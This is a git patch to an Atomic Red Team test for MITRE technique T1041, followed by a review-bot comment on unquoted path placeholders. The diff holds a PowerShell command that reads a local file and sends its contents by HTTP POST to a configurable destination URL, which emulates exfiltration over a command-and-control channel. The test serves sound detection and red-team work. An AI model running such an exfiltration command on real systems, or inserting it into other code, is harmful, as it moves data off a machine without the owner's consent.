From 7669b73daf347252ef4049b947fb0cb388c2f4b8 Mon Sep 17 00:00:00 2001
From: shamanth0912 <91321336+shamanth0912@users.noreply.github.com>
Date: Thu, 13 Jan 2022 01:56:26 +0530
Subject: [PATCH] Modify T1041.yaml (#1716)
* Modify T1041.yaml
Adding cleanup command and prereq command to Base command
* Update T1041.yaml
Modified a bit to only create the file if it doesn't already exist and choosing not to delete since it is only one small file being added to the temp directory without any sensitive information in it.
Co-authored-by: Carrie Roberts
---
 atomics/T1041/T1041.yaml | 20 +++++++-------------
 1 file changed, 7 insertions(+), 13 deletions(-)
diff --git a/atomics/T1041/T1041.yaml b/atomics/T1041/T1041.yaml
index 547e7bd3..1b6a2fb3 100644
--- a/atomics/T1041/T1041.yaml
+++ b/atomics/T1041/T1041.yaml
@@ -15,19 +15,13 @@ atomic_tests:
 filepath:
 description: The file which is being exfiltrated to the C2 Server.
 type: Path
- default: C:\Users\$env:UserName\LineNumbers.txt
- dependency_executor_name: powershell
- dependencies:
- - description: |
- The file to be exfiltrated must be present on the machine. Running the pre-reqs will create a sample file to be exfiltrated, else give the path of already present file as input.
- prereq_command: |
- if ([System.IO.File]::Exists("#{filepath}")){exit 0} else {exit 1}
- get_prereq_command: |
- echo "Creating file to be exfiltrated"
- 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
+ default: $env:TEMP\LineNumbers.txt
 executor:
 command: |
- [System.Net.ServicePointManager]::Expect100Continue = $false
- $filecontent = Get-Content -Path #{filepath}
- Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
+ if(-not (Test-Path #{filepath})){
+ 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
+ }
+ [System.Net.ServicePointManager]::Expect100Continue = $false
+ $filecontent = Get-Content -Path #{filepath}
+ Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
 name: powershell
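Review bot: The `#{filepath}` placeholder is unquoted in the three new command lines, so the new default `$env:TEMP\LineNumbers.txt` breaks as soon as the TEMP directory contains a space (a profile path like `C:\Users\Jane Doe\…`, constructed example), because `Test-Path`, `Add-Content -Path` and `Get-Content -Path` then receive the path as two separate arguments; the removed prereq_command quoted the path, the replacement does not. Wrapping the placeholder restores that: `if(-not (Test-Path "#{filepath}")){`, `Add-Content -Path "#{filepath}" -Value "This is line $_."`, `$filecontent = Get-Content -Path "#{filepath}"`. Folding the file creation into the executor also means the test now writes to TEMP immediately before the POST, which detection content built around this atomic should expect; the commit message records the deliberate decision not to add a cleanup_command, so the file persists between runs. The atomic test entry begins above the hunk and its executor block may continue past `name: powershell`.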